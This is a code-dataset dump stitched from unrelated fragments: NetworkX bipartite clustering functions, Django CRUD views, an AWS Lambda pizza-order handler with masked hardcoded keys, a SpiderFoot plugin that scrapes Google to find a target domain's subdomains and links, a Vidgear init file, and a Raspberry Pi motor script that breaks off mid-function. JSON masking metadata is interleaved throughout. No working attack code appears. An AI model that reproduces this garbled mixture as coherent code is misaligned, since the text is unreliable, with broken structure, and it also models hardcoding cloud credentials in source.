Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if not nx.algorithms.bipartite.is_bipartite(G):\n raise nx.NetworkXError(\"Graph is not bipartite\")\n\n try:\n cc_func = modes[mode]\n except KeyError:\n raise nx.NetworkXError(\n \"Mode for bipartite clustering must be: dot, min or max\")\n\n if nodes is None:\n nodes = G\n ccs = {}\n for v in nodes:\n cc = 0.0\n nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])\n for u in nbrs2:\n cc += cc_func(set(G[u]), set(G[v]))\n if cc > 0.0: # len(nbrs2)>0\n cc /= len(nbrs2)\n ccs[v] = cc\n return ccs\n\n\nclustering = latapy_clustering\n\n\ndef average_clustering(G, nodes=None, mode='dot'):\n r\"\"\"Compute the average bipartite clustering coefficient.\n\n A clustering coefficient for the whole graph is the average, \n\n .. math::\n\n C = \\frac{1}{n}\\sum_{v \\in G} c_v,\n\n where `n` is the number of nodes in `G`.\n\n Similar measures for the two bipartite sets can be defined [1]_\n\n .. math::\n\n C_X = \\frac{1}{|X|}\\sum_{v \\in X} c_v,\n\n where `X` is a bipartite set of `G`.\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n nodes : list or iterable, optional\n A container of nodes to use in computing the average. \n The nodes should be either the entire graph (the default) or one of the \n bipartite sets.\n\n mode : string\n The pariwise bipartite clustering method. \n It must be \"dot\", \"max\", or \"min\" \n\n Returns\n -------\n clustering : float\n The average bipartite clustering for the given set of nodes or the \n entire graph if no nodes are specified.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G=nx.star_graph(3) # star graphs are bipartite\n >>> bipartite.average_clustering(G) \n 0.75\n >>> X,Y=bipartite.sets(G)\n >>> bipartite.average_clustering(G,X) \n 0.0\n >>> bipartite.average_clustering(G,Y) \n 1.0\n\n See Also\n --------\n clustering\n\n Notes \n -----\n The container of nodes passed to this function must contain all of the nodes\n in one of the bipartite sets (\"top\" or \"bottom\") in order to compute \n the correct average bipartite clustering coefficients.\n See :mod:`bipartite documentation <networkx.algorithms.bipartite>`\n for further details on how bipartite graphs are handled in NetworkX.\n\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if nodes is None:\n nodes = G\n ccs = latapy_clustering(G, nodes=nodes, mode=mode)\n return float(sum(ccs[v] for v in nodes)) / len(nodes)\n\n\ndef robins_alexander_clustering(G):\n r\"\"\"Compute the bipartite clustering of G.\n\n Robins and Alexander [1]_ defined bipartite clustering coefficient as\n four times the number of four cycles `C_4` divided by the number of\n three paths `L_3` in a bipartite graph:\n\n .. math::\n\n CC_4 = \\frac{4 * C_4}{L_3}\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n Returns\n -------\n clustering : float\n The Robins and Alexander bipartite clustering for the input graph.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.davis_southern_women_graph()\n >>> print(round(bipartite.robins_alexander_clustering(G), 3))\n 0.468\n\n See Also\n --------\n latapy_clustering\n square_clustering\n\n References\n ----------\n .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking \n directors: Network structure and distance in bipartite graphs. \n Computational & Mathematical Organization Theory 10(1), 69–94.\n\n \"\"\"\n if G.order() < 4 or G.size() < 3:\n return 0\n L_3 = _threepaths(G)\n if L_3 == 0:\n return 0\n C_4 = _four_cycles(G)\n return (4. * C_4) / L_3\n\n\ndef _four_cycles(G):\n cycles = 0\n for v in G:\n for u, w in itertools.combinations(G[v], 2):\n cycles += len((set(G[u]) & set(G[w])) - set([v]))\n return cycles / 4\n\n\ndef _threepaths(G):\n paths = 0\n for v in G:\n for u in G[v]:\n for w in set(G[u]) - set([v]):\n paths += len(set(G[w]) - set([v, u]))\n # Divide by two because we count each three path twice\n # one for each possible starting point\n return paths / 2\n",
"step-ids": [
4,
8,
9,
10,
11
]
}
|
[
4,
8,
9,
10,
11
] |
from django.urls import reverse_lazy
from django.views.generic import (
ListView,
DetailView,
CreateView,
UpdateView,
DeleteView,
)
from .models import Entry
class EntryListView(ListView):
model = Entry
queryset = Entry.objects.all().order_by("-date_created")
class EntryDetailView(DetailView):
model = Entry
class EntryCreateView(CreateView):
model = Entry
fields = ["title", "content"]
success_url = reverse_lazy("entry-list")
class EntryUpdateView(UpdateView):
model = Entry
fields = ["title", "content"]
def get_success_url(self):
return reverse_lazy("entry-detail", kwargs={"pk": self.entry.id})
class EntryDeleteView(DeleteView):
model = Entry
success_url = reverse_lazy("entry-list")
|
normal
|
{
"blob_id": "37c03732ae52171fc24aec85c940848b02d76dc1",
"index": 1176,
"step-1": "<mask token>\n\n\nclass EntryCreateView(CreateView):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass EntryUpdateView(UpdateView):\n model = Entry\n fields = ['title', 'content']\n\n def get_success_url(self):\n return reverse_lazy('entry-detail', kwargs={'pk': self.entry.id})\n\n\nclass EntryDeleteView(DeleteView):\n model = Entry\n success_url = reverse_lazy('entry-list')\n",
"step-2": "<mask token>\n\n\nclass EntryCreateView(CreateView):\n model = Entry\n fields = ['title', 'content']\n success_url = reverse_lazy('entry-list')\n\n\nclass EntryUpdateView(UpdateView):\n model = Entry\n fields = ['title', 'content']\n\n def get_success_url(self):\n return reverse_lazy('entry-detail', kwargs={'pk': self.entry.id})\n\n\nclass EntryDeleteView(DeleteView):\n model = Entry\n success_url = reverse_lazy('entry-list')\n",
"step-3": "<mask token>\n\n\nclass EntryListView(ListView):\n <mask token>\n <mask token>\n\n\nclass EntryDetailView(DetailView):\n model = Entry\n\n\nclass EntryCreateView(CreateView):\n model = Entry\n fields = ['title', 'content']\n success_url = reverse_lazy('entry-list')\n\n\nclass EntryUpdateView(UpdateView):\n model = Entry\n fields = ['title', 'content']\n\n def get_success_url(self):\n return reverse_lazy('entry-detail', kwargs={'pk': self.entry.id})\n\n\nclass EntryDeleteView(DeleteView):\n model = Entry\n success_url = reverse_lazy('entry-list')\n",
"step-4": "<mask token>\n\n\nclass EntryListView(ListView):\n model = Entry\n queryset = Entry.objects.all().order_by('-date_created')\n\n\nclass EntryDetailView(DetailView):\n model = Entry\n\n\nclass EntryCreateView(CreateView):\n model = Entry\n fields = ['title', 'content']\n success_url = reverse_lazy('entry-list')\n\n\nclass EntryUpdateView(UpdateView):\n model = Entry\n fields = ['title', 'content']\n\n def get_success_url(self):\n return reverse_lazy('entry-detail', kwargs={'pk': self.entry.id})\n\n\nclass EntryDeleteView(DeleteView):\n model = Entry\n success_url = reverse_lazy('entry-list')\n",
"step-5": "from django.urls import reverse_lazy\nfrom django.views.generic import (\n ListView,\n DetailView,\n CreateView,\n UpdateView,\n DeleteView,\n)\n\nfrom .models import Entry\n\n\nclass EntryListView(ListView):\n model = Entry\n queryset = Entry.objects.all().order_by(\"-date_created\")\n\n\nclass EntryDetailView(DetailView):\n model = Entry\n\n\nclass EntryCreateView(CreateView):\n model = Entry\n fields = [\"title\", \"content\"]\n success_url = reverse_lazy(\"entry-list\")\n\n\nclass EntryUpdateView(UpdateView):\n model = Entry\n fields = [\"title\", \"content\"]\n\n def get_success_url(self):\n return reverse_lazy(\"entry-detail\", kwargs={\"pk\": self.entry.id})\n\n\nclass EntryDeleteView(DeleteView):\n model = Entry\n success_url = reverse_lazy(\"entry-list\")\n",
"step-ids": [
6,
7,
10,
11,
13
]
}
|
[
6,
7,
10,
11,
13
] |
default_app_config = 'reman.apps.RemanConfig'
|
normal
|
{
"blob_id": "0b0b928aef9a4e9953b02639bf5e7769cc4389d7",
"index": 2488,
"step-1": "<mask token>\n",
"step-2": "default_app_config = 'reman.apps.RemanConfig'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def handler(event, context):
dynamodb = boto3.resource('dynamodb', region_name='us-west-2',
aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)
table = dynamodb.Table('orders')
body = event['body-json']
response = table.put_item(Item=body)
menu_id = body['menu_id']
table = dynamodb.Table('pizzashop')
menu = table.get_item(Key={'menu_id': menu_id})
selection = menu['Item']['selection']
index = 0
all_items = ''
for item in selection:
index += 1
all_items += str(index) + '. ' + item + ','
all_items = all_items[:-1]
message = 'Hi ' + body['customer_name'
] + ', please choose one of these selection: ' + all_items
return {'message': message}
<|reserved_special_token_1|>
<|reserved_special_token_0|>
AWS_KEY = '****'
AWS_SECRET = '****'
def handler(event, context):
dynamodb = boto3.resource('dynamodb', region_name='us-west-2',
aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)
table = dynamodb.Table('orders')
body = event['body-json']
response = table.put_item(Item=body)
menu_id = body['menu_id']
table = dynamodb.Table('pizzashop')
menu = table.get_item(Key={'menu_id': menu_id})
selection = menu['Item']['selection']
index = 0
all_items = ''
for item in selection:
index += 1
all_items += str(index) + '. ' + item + ','
all_items = all_items[:-1]
message = 'Hi ' + body['customer_name'
] + ', please choose one of these selection: ' + all_items
return {'message': message}
<|reserved_special_token_1|>
from __future__ import print_function
import boto3
import json
import decimal
AWS_KEY = '****'
AWS_SECRET = '****'
def handler(event, context):
dynamodb = boto3.resource('dynamodb', region_name='us-west-2',
aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)
table = dynamodb.Table('orders')
body = event['body-json']
response = table.put_item(Item=body)
menu_id = body['menu_id']
table = dynamodb.Table('pizzashop')
menu = table.get_item(Key={'menu_id': menu_id})
selection = menu['Item']['selection']
index = 0
all_items = ''
for item in selection:
index += 1
all_items += str(index) + '. ' + item + ','
all_items = all_items[:-1]
message = 'Hi ' + body['customer_name'
] + ', please choose one of these selection: ' + all_items
return {'message': message}
<|reserved_special_token_1|>
from __future__ import print_function # Python 2/3 compatibility
import boto3
import json
import decimal
AWS_KEY = '****'
AWS_SECRET = '****'
def handler(event, context):
dynamodb = boto3.resource('dynamodb', region_name='us-west-2', aws_access_key_id=AWS_KEY , aws_secret_access_key=AWS_SECRET)
table = dynamodb.Table('orders')
body = event['body-json']
response = table.put_item(Item=body)
menu_id = body['menu_id']
table = dynamodb.Table('pizzashop')
menu = table.get_item(
Key={
'menu_id': menu_id,
}
)
selection = menu['Item']['selection']
index = 0
all_items = ''
for item in selection:
index +=1
all_items += str(index) + '. ' + item + ','
all_items = all_items[:-1]
message = "Hi " + body['customer_name'] + ', please choose one of these selection: ' + all_items
return {"message" : message}
#return menu
|
flexible
|
{
"blob_id": "511ea9eb1dc234a488c19f9ee9fbd40f81955d54",
"index": 5172,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef handler(event, context):\n dynamodb = boto3.resource('dynamodb', region_name='us-west-2',\n aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)\n table = dynamodb.Table('orders')\n body = event['body-json']\n response = table.put_item(Item=body)\n menu_id = body['menu_id']\n table = dynamodb.Table('pizzashop')\n menu = table.get_item(Key={'menu_id': menu_id})\n selection = menu['Item']['selection']\n index = 0\n all_items = ''\n for item in selection:\n index += 1\n all_items += str(index) + '. ' + item + ','\n all_items = all_items[:-1]\n message = 'Hi ' + body['customer_name'\n ] + ', please choose one of these selection: ' + all_items\n return {'message': message}\n",
"step-3": "<mask token>\nAWS_KEY = '****'\nAWS_SECRET = '****'\n\n\ndef handler(event, context):\n dynamodb = boto3.resource('dynamodb', region_name='us-west-2',\n aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)\n table = dynamodb.Table('orders')\n body = event['body-json']\n response = table.put_item(Item=body)\n menu_id = body['menu_id']\n table = dynamodb.Table('pizzashop')\n menu = table.get_item(Key={'menu_id': menu_id})\n selection = menu['Item']['selection']\n index = 0\n all_items = ''\n for item in selection:\n index += 1\n all_items += str(index) + '. ' + item + ','\n all_items = all_items[:-1]\n message = 'Hi ' + body['customer_name'\n ] + ', please choose one of these selection: ' + all_items\n return {'message': message}\n",
"step-4": "from __future__ import print_function\nimport boto3\nimport json\nimport decimal\nAWS_KEY = '****'\nAWS_SECRET = '****'\n\n\ndef handler(event, context):\n dynamodb = boto3.resource('dynamodb', region_name='us-west-2',\n aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET)\n table = dynamodb.Table('orders')\n body = event['body-json']\n response = table.put_item(Item=body)\n menu_id = body['menu_id']\n table = dynamodb.Table('pizzashop')\n menu = table.get_item(Key={'menu_id': menu_id})\n selection = menu['Item']['selection']\n index = 0\n all_items = ''\n for item in selection:\n index += 1\n all_items += str(index) + '. ' + item + ','\n all_items = all_items[:-1]\n message = 'Hi ' + body['customer_name'\n ] + ', please choose one of these selection: ' + all_items\n return {'message': message}\n",
"step-5": "from __future__ import print_function # Python 2/3 compatibility\nimport boto3\nimport json\nimport decimal\n\nAWS_KEY = '****'\nAWS_SECRET = '****'\n\ndef handler(event, context):\n dynamodb = boto3.resource('dynamodb', region_name='us-west-2', aws_access_key_id=AWS_KEY , aws_secret_access_key=AWS_SECRET)\n table = dynamodb.Table('orders')\n\n body = event['body-json']\n response = table.put_item(Item=body)\n\n menu_id = body['menu_id']\n table = dynamodb.Table('pizzashop')\n menu = table.get_item(\n Key={\n 'menu_id': menu_id,\n }\n )\n\n selection = menu['Item']['selection']\n index = 0\n all_items = ''\n for item in selection:\n index +=1\n all_items += str(index) + '. ' + item + ','\n all_items = all_items[:-1]\n\n\n message = \"Hi \" + body['customer_name'] + ', please choose one of these selection: ' + all_items\n return {\"message\" : message}\n #return menu\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: sfp_googlesearch
# Purpose: Searches Google for content related to the domain in question.
#
# Author: Steve Micallef <steve@binarypool.com>
#
# Created: 07/05/2012
# Copyright: (c) Steve Micallef 2012
# Licence: GPL
# -------------------------------------------------------------------------------
from sflib import SpiderFoot, SpiderFootPlugin, SpiderFootEvent
class sfp_googlesearch(SpiderFootPlugin):
"""Google:Footprint,Investigate:Some light Google scraping to identify sub-domains and links."""
# Default options
opts = {
'fetchlinks': True, # Should we fetch links on the base domain?
'pages': 20 # Number of google results pages to iterate
}
# Option descriptions
optdescs = {
'fetchlinks': "Fetch links found on the target domain-name?",
'pages': "Number of Google results pages to iterate through."
}
# Target
results = list()
def setup(self, sfc, userOpts=dict()):
self.sf = sfc
self.results = list()
for opt in userOpts.keys():
self.opts[opt] = userOpts[opt]
# What events is this module interested in for input
def watchedEvents(self):
return ["INTERNET_NAME"]
# What events this module produces
# This is to support the end user in selecting modules based on events
# produced.
def producedEvents(self):
return ["LINKED_URL_INTERNAL", "SEARCH_ENGINE_WEB_CONTENT"]
def handleEvent(self, event):
eventName = event.eventType
srcModuleName = event.module
eventData = event.data
if eventData in self.results:
self.sf.debug("Already did a search for " + eventData + ", skipping.")
return None
else:
self.results.append(eventData)
# Sites hosted on the domain
pages = self.sf.googleIterate("site:" + eventData,
dict(limit=self.opts['pages'], useragent=self.opts['_useragent'],
timeout=self.opts['_fetchtimeout']))
if pages is None:
self.sf.info("No results returned from Google.")
return None
for page in pages.keys():
if page in self.results:
continue
else:
self.results.append(page)
# Check if we've been asked to stop
if self.checkForStop():
return None
# Submit the google results for analysis
evt = SpiderFootEvent("SEARCH_ENGINE_WEB_CONTENT", pages[page],
self.__name__, event)
self.notifyListeners(evt)
# We can optionally fetch links to our domain found in the search
# results. These may not have been identified through spidering.
if self.opts['fetchlinks']:
links = self.sf.parseLinks(page, pages[page], eventData)
if len(links) == 0:
continue
for link in links:
if link in self.results:
continue
else:
self.results.append(link)
self.sf.debug("Found a link: " + link)
if self.sf.urlFQDN(link).endswith(eventData):
if self.checkForStop():
return None
evt = SpiderFootEvent("LINKED_URL_INTERNAL", link,
self.__name__, event)
self.notifyListeners(evt)
# End of sfp_googlesearch class
|
normal
|
{
"blob_id": "3a6eaa238e78e7a818bcf6e18cc7881eadf94b07",
"index": 7863,
"step-1": "<mask token>\n\n\nclass sfp_googlesearch(SpiderFootPlugin):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def watchedEvents(self):\n return ['INTERNET_NAME']\n\n def producedEvents(self):\n return ['LINKED_URL_INTERNAL', 'SEARCH_ENGINE_WEB_CONTENT']\n\n def handleEvent(self, event):\n eventName = event.eventType\n srcModuleName = event.module\n eventData = event.data\n if eventData in self.results:\n self.sf.debug('Already did a search for ' + eventData +\n ', skipping.')\n return None\n else:\n self.results.append(eventData)\n pages = self.sf.googleIterate('site:' + eventData, dict(limit=self.\n opts['pages'], useragent=self.opts['_useragent'], timeout=self.\n opts['_fetchtimeout']))\n if pages is None:\n self.sf.info('No results returned from Google.')\n return None\n for page in pages.keys():\n if page in self.results:\n continue\n else:\n self.results.append(page)\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('SEARCH_ENGINE_WEB_CONTENT', pages[page],\n self.__name__, event)\n self.notifyListeners(evt)\n if self.opts['fetchlinks']:\n links = self.sf.parseLinks(page, pages[page], eventData)\n if len(links) == 0:\n continue\n for link in links:\n if link in self.results:\n continue\n else:\n self.results.append(link)\n self.sf.debug('Found a link: ' + link)\n if self.sf.urlFQDN(link).endswith(eventData):\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('LINKED_URL_INTERNAL', link,\n self.__name__, event)\n self.notifyListeners(evt)\n",
"step-2": "<mask token>\n\n\nclass sfp_googlesearch(SpiderFootPlugin):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def setup(self, sfc, userOpts=dict()):\n self.sf = sfc\n self.results = list()\n for opt in userOpts.keys():\n self.opts[opt] = userOpts[opt]\n\n def watchedEvents(self):\n return ['INTERNET_NAME']\n\n def producedEvents(self):\n return ['LINKED_URL_INTERNAL', 'SEARCH_ENGINE_WEB_CONTENT']\n\n def handleEvent(self, event):\n eventName = event.eventType\n srcModuleName = event.module\n eventData = event.data\n if eventData in self.results:\n self.sf.debug('Already did a search for ' + eventData +\n ', skipping.')\n return None\n else:\n self.results.append(eventData)\n pages = self.sf.googleIterate('site:' + eventData, dict(limit=self.\n opts['pages'], useragent=self.opts['_useragent'], timeout=self.\n opts['_fetchtimeout']))\n if pages is None:\n self.sf.info('No results returned from Google.')\n return None\n for page in pages.keys():\n if page in self.results:\n continue\n else:\n self.results.append(page)\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('SEARCH_ENGINE_WEB_CONTENT', pages[page],\n self.__name__, event)\n self.notifyListeners(evt)\n if self.opts['fetchlinks']:\n links = self.sf.parseLinks(page, pages[page], eventData)\n if len(links) == 0:\n continue\n for link in links:\n if link in self.results:\n continue\n else:\n self.results.append(link)\n self.sf.debug('Found a link: ' + link)\n if self.sf.urlFQDN(link).endswith(eventData):\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('LINKED_URL_INTERNAL', link,\n self.__name__, event)\n self.notifyListeners(evt)\n",
"step-3": "<mask token>\n\n\nclass sfp_googlesearch(SpiderFootPlugin):\n \"\"\"Google:Footprint,Investigate:Some light Google scraping to identify sub-domains and links.\"\"\"\n opts = {'fetchlinks': True, 'pages': 20}\n optdescs = {'fetchlinks':\n 'Fetch links found on the target domain-name?', 'pages':\n 'Number of Google results pages to iterate through.'}\n results = list()\n\n def setup(self, sfc, userOpts=dict()):\n self.sf = sfc\n self.results = list()\n for opt in userOpts.keys():\n self.opts[opt] = userOpts[opt]\n\n def watchedEvents(self):\n return ['INTERNET_NAME']\n\n def producedEvents(self):\n return ['LINKED_URL_INTERNAL', 'SEARCH_ENGINE_WEB_CONTENT']\n\n def handleEvent(self, event):\n eventName = event.eventType\n srcModuleName = event.module\n eventData = event.data\n if eventData in self.results:\n self.sf.debug('Already did a search for ' + eventData +\n ', skipping.')\n return None\n else:\n self.results.append(eventData)\n pages = self.sf.googleIterate('site:' + eventData, dict(limit=self.\n opts['pages'], useragent=self.opts['_useragent'], timeout=self.\n opts['_fetchtimeout']))\n if pages is None:\n self.sf.info('No results returned from Google.')\n return None\n for page in pages.keys():\n if page in self.results:\n continue\n else:\n self.results.append(page)\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('SEARCH_ENGINE_WEB_CONTENT', pages[page],\n self.__name__, event)\n self.notifyListeners(evt)\n if self.opts['fetchlinks']:\n links = self.sf.parseLinks(page, pages[page], eventData)\n if len(links) == 0:\n continue\n for link in links:\n if link in self.results:\n continue\n else:\n self.results.append(link)\n self.sf.debug('Found a link: ' + link)\n if self.sf.urlFQDN(link).endswith(eventData):\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('LINKED_URL_INTERNAL', link,\n self.__name__, event)\n self.notifyListeners(evt)\n",
"step-4": "from sflib import SpiderFoot, SpiderFootPlugin, SpiderFootEvent\n\n\nclass sfp_googlesearch(SpiderFootPlugin):\n \"\"\"Google:Footprint,Investigate:Some light Google scraping to identify sub-domains and links.\"\"\"\n opts = {'fetchlinks': True, 'pages': 20}\n optdescs = {'fetchlinks':\n 'Fetch links found on the target domain-name?', 'pages':\n 'Number of Google results pages to iterate through.'}\n results = list()\n\n def setup(self, sfc, userOpts=dict()):\n self.sf = sfc\n self.results = list()\n for opt in userOpts.keys():\n self.opts[opt] = userOpts[opt]\n\n def watchedEvents(self):\n return ['INTERNET_NAME']\n\n def producedEvents(self):\n return ['LINKED_URL_INTERNAL', 'SEARCH_ENGINE_WEB_CONTENT']\n\n def handleEvent(self, event):\n eventName = event.eventType\n srcModuleName = event.module\n eventData = event.data\n if eventData in self.results:\n self.sf.debug('Already did a search for ' + eventData +\n ', skipping.')\n return None\n else:\n self.results.append(eventData)\n pages = self.sf.googleIterate('site:' + eventData, dict(limit=self.\n opts['pages'], useragent=self.opts['_useragent'], timeout=self.\n opts['_fetchtimeout']))\n if pages is None:\n self.sf.info('No results returned from Google.')\n return None\n for page in pages.keys():\n if page in self.results:\n continue\n else:\n self.results.append(page)\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('SEARCH_ENGINE_WEB_CONTENT', pages[page],\n self.__name__, event)\n self.notifyListeners(evt)\n if self.opts['fetchlinks']:\n links = self.sf.parseLinks(page, pages[page], eventData)\n if len(links) == 0:\n continue\n for link in links:\n if link in self.results:\n continue\n else:\n self.results.append(link)\n self.sf.debug('Found a link: ' + link)\n if self.sf.urlFQDN(link).endswith(eventData):\n if self.checkForStop():\n return None\n evt = SpiderFootEvent('LINKED_URL_INTERNAL', link,\n self.__name__, event)\n self.notifyListeners(evt)\n",
"step-5": "# -*- coding: utf-8 -*-\r\n# -------------------------------------------------------------------------------\r\n# Name: sfp_googlesearch\r\n# Purpose: Searches Google for content related to the domain in question.\r\n#\r\n# Author: Steve Micallef <steve@binarypool.com>\r\n#\r\n# Created: 07/05/2012\r\n# Copyright: (c) Steve Micallef 2012\r\n# Licence: GPL\r\n# -------------------------------------------------------------------------------\r\n\r\nfrom sflib import SpiderFoot, SpiderFootPlugin, SpiderFootEvent\r\n\r\n\r\nclass sfp_googlesearch(SpiderFootPlugin):\r\n \"\"\"Google:Footprint,Investigate:Some light Google scraping to identify sub-domains and links.\"\"\"\r\n\r\n # Default options\r\n opts = {\r\n 'fetchlinks': True, # Should we fetch links on the base domain?\r\n 'pages': 20 # Number of google results pages to iterate\r\n }\r\n\r\n # Option descriptions\r\n optdescs = {\r\n 'fetchlinks': \"Fetch links found on the target domain-name?\",\r\n 'pages': \"Number of Google results pages to iterate through.\"\r\n }\r\n\r\n # Target\r\n results = list()\r\n\r\n def setup(self, sfc, userOpts=dict()):\r\n self.sf = sfc\r\n self.results = list()\r\n\r\n for opt in userOpts.keys():\r\n self.opts[opt] = userOpts[opt]\r\n\r\n # What events is this module interested in for input\r\n def watchedEvents(self):\r\n return [\"INTERNET_NAME\"]\r\n\r\n # What events this module produces\r\n # This is to support the end user in selecting modules based on events\r\n # produced.\r\n def producedEvents(self):\r\n return [\"LINKED_URL_INTERNAL\", \"SEARCH_ENGINE_WEB_CONTENT\"]\r\n\r\n def handleEvent(self, event):\r\n eventName = event.eventType\r\n srcModuleName = event.module\r\n eventData = event.data\r\n\r\n if eventData in self.results:\r\n self.sf.debug(\"Already did a search for \" + eventData + \", skipping.\")\r\n return None\r\n else:\r\n self.results.append(eventData)\r\n\r\n # Sites hosted on the domain\r\n pages = self.sf.googleIterate(\"site:\" + eventData,\r\n dict(limit=self.opts['pages'], useragent=self.opts['_useragent'],\r\n timeout=self.opts['_fetchtimeout']))\r\n if pages is None:\r\n self.sf.info(\"No results returned from Google.\")\r\n return None\r\n\r\n for page in pages.keys():\r\n if page in self.results:\r\n continue\r\n else:\r\n self.results.append(page)\r\n\r\n # Check if we've been asked to stop\r\n if self.checkForStop():\r\n return None\r\n\r\n # Submit the google results for analysis\r\n evt = SpiderFootEvent(\"SEARCH_ENGINE_WEB_CONTENT\", pages[page],\r\n self.__name__, event)\r\n self.notifyListeners(evt)\r\n\r\n # We can optionally fetch links to our domain found in the search\r\n # results. These may not have been identified through spidering.\r\n if self.opts['fetchlinks']:\r\n links = self.sf.parseLinks(page, pages[page], eventData)\r\n if len(links) == 0:\r\n continue\r\n\r\n for link in links:\r\n if link in self.results:\r\n continue\r\n else:\r\n self.results.append(link)\r\n self.sf.debug(\"Found a link: \" + link)\r\n if self.sf.urlFQDN(link).endswith(eventData):\r\n if self.checkForStop():\r\n return None\r\n\r\n evt = SpiderFootEvent(\"LINKED_URL_INTERNAL\", link,\r\n self.__name__, event)\r\n self.notifyListeners(evt)\r\n\r\n# End of sfp_googlesearch class\r\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
radius = int(input("enter the value for the radius of the cycle: "))
circumference = 2 * 3.14159 * radius
diameter = 2 * radius
area = 3.14159 * radius ** 2
print('circumference is ', circumference)
print('diameter is: ', diameter)
print('area is ', area)
|
normal
|
{
"blob_id": "ab5412a3d22bd53a592c93bad4870b06fd9f0720",
"index": 4080,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('circumference is ', circumference)\nprint('diameter is: ', diameter)\nprint('area is ', area)\n",
"step-3": "radius = int(input('enter the value for the radius of the cycle: '))\ncircumference = 2 * 3.14159 * radius\ndiameter = 2 * radius\narea = 3.14159 * radius ** 2\nprint('circumference is ', circumference)\nprint('diameter is: ', diameter)\nprint('area is ', area)\n",
"step-4": "radius = int(input(\"enter the value for the radius of the cycle: \"))\ncircumference = 2 * 3.14159 * radius\ndiameter = 2 * radius\narea = 3.14159 * radius ** 2\n\nprint('circumference is ', circumference)\nprint('diameter is: ', diameter)\nprint('area is ', area)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__all__ = ['PiGear', 'CamGear', 'VideoGear']
<|reserved_special_token_1|>
from .pigear import PiGear
from .camgear import CamGear
from .videogear import VideoGear
__all__ = ['PiGear', 'CamGear', 'VideoGear']
<|reserved_special_token_1|>
# import the necessary packages
from .pigear import PiGear
from .camgear import CamGear
from .videogear import VideoGear
__all__ = ["PiGear", "CamGear", "VideoGear"]
|
flexible
|
{
"blob_id": "3431e342c940b0d91f817c3e583728e55e305210",
"index": 8940,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n__all__ = ['PiGear', 'CamGear', 'VideoGear']\n",
"step-3": "from .pigear import PiGear\nfrom .camgear import CamGear\nfrom .videogear import VideoGear\n__all__ = ['PiGear', 'CamGear', 'VideoGear']\n",
"step-4": "# import the necessary packages\nfrom .pigear import PiGear\nfrom .camgear import CamGear\nfrom .videogear import VideoGear\n\n__all__ = [\"PiGear\", \"CamGear\", \"VideoGear\"]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/python3
import RPi.GPIO as GPIO
import time
# motor_EN_A: Pin7 | motor_EN_B: Pin11
# motor_A: Pin8,Pin10 | motor_B: Pin13,Pin12
#Motor_A_EN = 7
Motor_B_EN = 11
#Motor_A_Pin1 = 8
#Motor_A_Pin2 = 10
Motor_B_Pin1 = 13
Motor_B_Pin2 = 12
Dir_forward = 0
Dir_backward = 1
#pwm_A = 0
pwm_B = 0
def setup():#Motor initialization
global pwm_A, pwm_B
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
#GPIO.setup(Motor_A_EN, GPIO.OUT)
GPIO.setup(Motor_B_EN, GPIO.OUT)
#GPIO.setup(Motor_A_Pin1, GPIO.OUT)
#GPIO.setup(Motor_A_Pin2, GPIO.OUT)
GPIO.setup(Motor_B_Pin1, GPIO.OUT)
GPIO.setup(Motor_B_Pin2, GPIO.OUT)
#pwm_A = GPIO.PWM(Motor_A_EN, 1000)
pwm_B = GPIO.PWM(Motor_B_EN, 1000)
def motorStop():#Motor stops
#GPIO.output(Motor_A_Pin1, GPIO.LOW)
#GPIO.output(Motor_A_Pin2, GPIO.LOW)
GPIO.output(Motor_B_Pin1, GPIO.LOW)
GPIO.output(Motor_B_Pin2, GPIO.LOW)
#GPIO.output(Motor_A_EN, GPIO.LOW)
GPIO.output(Motor_B_EN, GPIO.LOW)
def motorStart(status, direction, speed):#Motor 2 positive and negative rotation
global pwm_B
if status == 0: # stop
motorStop()
else:
if direction == Dir_forward:
GPIO.output(Motor_B_Pin1, GPIO.HIGH)
GPIO.output(Motor_B_Pin2, GPIO.LOW)
pwm_B.start(100)
pwm_B.ChangeDutyCycle(speed)
elif direction == Dir_backward:
GPIO.output(Motor_B_Pin1, GPIO.LOW)
